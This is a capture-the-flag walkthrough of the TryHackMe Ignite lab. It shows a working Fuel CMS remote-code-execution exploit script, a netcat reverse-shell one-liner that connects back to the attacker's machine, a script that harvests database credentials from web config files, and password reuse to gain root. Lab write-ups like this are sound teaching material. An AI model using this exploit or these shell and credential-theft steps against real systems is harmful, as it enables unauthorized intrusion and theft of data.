The TryHackMe Ignite room is available at https://tryhackme.com/room/ignite
As always, the first step is an nmap scan of the target.
sudo nmap -sS -sV -vv -T4 x.x.x.x
- -sS for Syn/Stealth Scan
- -sV to find out version information
- -T4 for a fast aggressive scan
- -vv for very verbose to monitor the scan
And we get the following
- PORT STATE SERVICE REASON VERSION
- 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
Now that we know it is a webserver, let's browse to the machine and see what we can find. The landing page is the default Fuel CMS welcome page, so we now know what software is running.
We know it is a webapp, so let's run a dirb scan and see if we can find any hidden files or folders that could be useful.
dirb http://x.x.x.x /usr/share/dirb/wordlists/common.txt
This gives us some directories, but not much else of interest:
- ---- Scanning URL: http://x.x.x.x/ ----
- + http://x.x.x.x/@ (CODE:400|SIZE:1134)
- + http://x.x.x.x/0 (CODE:200|SIZE:16595)
- ==> DIRECTORY: http://x.x.x.x/assets/
- + http://x.x.x.x/home (CODE:200|SIZE:16595)
- + http://x.x.x.x/index (CODE:200|SIZE:16595)
- + http://x.x.x.x/index.php (CODE:200|SIZE:16595)
- + http://x.x.x.x/lost+found (CODE:400|SIZE:1134)
- + http://x.x.x.x/offline (CODE:200|SIZE:70)
- + http://x.x.x.x/robots.txt (CODE:200|SIZE:30)
- + http://x.x.x.x/server-status (CODE:403|SIZE:300)
- ---- Entering directory: http://x.x.x.x/assets/ ----
- + http://x.x.x.x/assets/@ (CODE:400|SIZE:1134)
- ==> DIRECTORY: http://x.x.x.x/assets/cache/
- ==> DIRECTORY: http://x.x.x.x/assets/css/
- ==> DIRECTORY: http://x.x.x.x/assets/docs/
- ==> DIRECTORY: http://x.x.x.x/assets/images/
- ==> DIRECTORY: http://x.x.x.x/assets/js/
- + http://x.x.x.x/assets/lost+found (CODE:400|SIZE:1134)
- ==> DIRECTORY: http://x.x.x.x/assets/pdf/
- ==> DIRECTORY: http://x.x.x.x/assets/swf/
However, running searchsploit against Fuel CMS shows that there are public exploits available for it. For more information, have a look at the exploit-db page at https://www.exploit-db.com/exploits/47138
The local copy of the exploit lives under /usr/share/exploitdb/exploits/linux/webapps. Copy the 47138.py file to your working folder (searchsploit -m 47138 does the same thing).
The exploit needs some modification, as the author was routing requests through Burp as a proxy. You can either run Burp as a proxy yourself or edit the script so it looks like the code below. It is Python 2 code (urllib.quote), so run it with python2, and remember to change x.x.x.x to the IP of the Ignite machine.
```python
import requests
import urllib

URL = "http://x.x.x.x"  # IP of the Ignite machine, no trailing slash

def find_nth_overlapping(haystack, needle, n):
    # Index of the n-th (possibly overlapping) occurrence of needle, or -1 if absent
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
    # Python 2 input() evaluates what you type, so enter the command as a quoted string, e.g. "id"
    xxxx = input('cmd:')
    # URL-encoded filter injection from the exploit-db entry, with our command spliced into the system() call
    url = URL+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    r = requests.get(url)
    # The command output sits at the top of the response and then repeats; print only up to the second copy
    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)
    print(r.text[0:dup])
```
This gives you a very limited shell. You can run any command www-data can run, but because this script uses Python 2's input(), which evaluates the line you type, each command has to be entered as a quoted string, e.g. "id".
We can get a slightly more usable shell by catching a reverse shell with netcat. Open another terminal on your own machine and run the following command:
nc -nvlp 4444
This creates a netcat listener, waiting for a connection on port 4444.
Now, at the cmd: prompt of the exploit script, run the command below. This time x.x.x.x is the IP of your own machine (the one running the listener), not the Ignite box:
"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 4444 >/tmp/f"
This starts an interactive /bin/sh on Ignite with its input and output piped through a netcat connection back to your waiting listener. For more information, see the pentestmonkey reverse shell cheat sheet at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
You now have a much better shell.
After running the whoami command, we see we are the user www-data. Check to see if you find any interesting files in the home directory for www-data.
Now it is time to get root. First we check whether we can run any commands via sudo (sudo -l).
But we get an error message
However, the Fuel CMS landing page talks about configuring the database, so the database configuration may hold useful credentials. Look through the sub folders of /var/www/html for the configuration file.
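The manual hunt through /var/www/html is the sort of thing worth scripting, since the same idea (find the CMS config file, pull out the database credentials) comes up on most web boxes. The script below is an added example, not part of the original walkthrough: it walks a web root for common config file names and extracts credential-looking keys, and it goes a little beyond this box by also handling WordPress define() and dotenv style settings. The demo tree it builds is constructed for the example, and the file contents and password in it are made up; the path fuel/application/config/database.php is where a stock Fuel CMS (CodeIgniter based) install keeps its database settings.

```python
"""Hunt a web root for configuration files holding database credentials.
Added example, not from the original walkthrough. The demo tree and the
database.php contents below are constructed; the password is made up."""
import os
import re
import tempfile

# File names worth opening; Fuel CMS uses database.php, others are common elsewhere
CONFIG_NAMES = {"database.php", "config.php", "wp-config.php", ".env", "settings.php"}

PATTERNS = [
    # CodeIgniter / Fuel CMS:  $db['default']['password'] = 'secret';
    re.compile(r"\$db\['\w+'\]\['(?P<key>\w+)'\]\s*=\s*'(?P<val>[^']*)'"),
    # WordPress:  define('DB_PASSWORD', 'secret');
    re.compile(r"define\(\s*'(?P<key>DB_\w+)'\s*,\s*'(?P<val>[^']*)'\s*\)"),
    # dotenv:  DB_PASSWORD=secret
    re.compile(r"^(?P<key>DB_\w+)=(?P<val>.*)$", re.MULTILINE),
]
# Only report keys that look like connection details
INTERESTING = ("user", "pass", "host", "name", "database")


def find_config_files(root):
    """Return every file under root whose name is in CONFIG_NAMES."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name in CONFIG_NAMES:
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def extract_credentials(path):
    """Return {key: value} for credential-looking settings found in one file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    found = {}
    for pat in PATTERNS:
        for m in pat.finditer(text):
            key = m.group("key").lower()
            if any(word in key for word in INTERESTING):
                found[key] = m.group("val")
    return found


def hunt(root):
    """Map each config file (relative to root) to the credentials it contains."""
    results = {}
    for path in find_config_files(root):
        creds = extract_credentials(path)
        if creds:
            results[os.path.relpath(path, root)] = creds
    return results


def build_demo_webroot():
    """Constructed sample tree mimicking a Fuel CMS install under /var/www/html."""
    root = tempfile.mkdtemp()
    cfg = os.path.join(root, "fuel", "application", "config")
    os.makedirs(cfg)
    with open(os.path.join(cfg, "database.php"), "w") as fh:
        fh.write("<?php\n"
                 "$db['default']['hostname'] = 'localhost';\n"
                 "$db['default']['username'] = 'root';\n"
                 "$db['default']['password'] = 'examplepass';\n"  # made-up value
                 "$db['default']['database'] = 'fuel_schema';\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello';\n")  # unrelated file, must not be reported
    return root


if __name__ == "__main__":
    # Against a real box: hunt("/var/www/html")
    for cfg_file, creds in hunt(build_demo_webroot()).items():
        print(cfg_file, creds)
```

A database password found this way is worth trying for local accounts too, which is exactly what happens next on this box.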
And it does: it gives us the root login and password for the database. Now we can try to use the same password with su.
It is not that easy though; we get an error message:
su: must be run from a terminal
However, if we run the following commands we get a working terminal, assuming the box has python installed:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
Now let's try su again.
After entering the root password we found in the configuration file, we are root. A quick visit to /root/ to find the second flag and the machine is complete.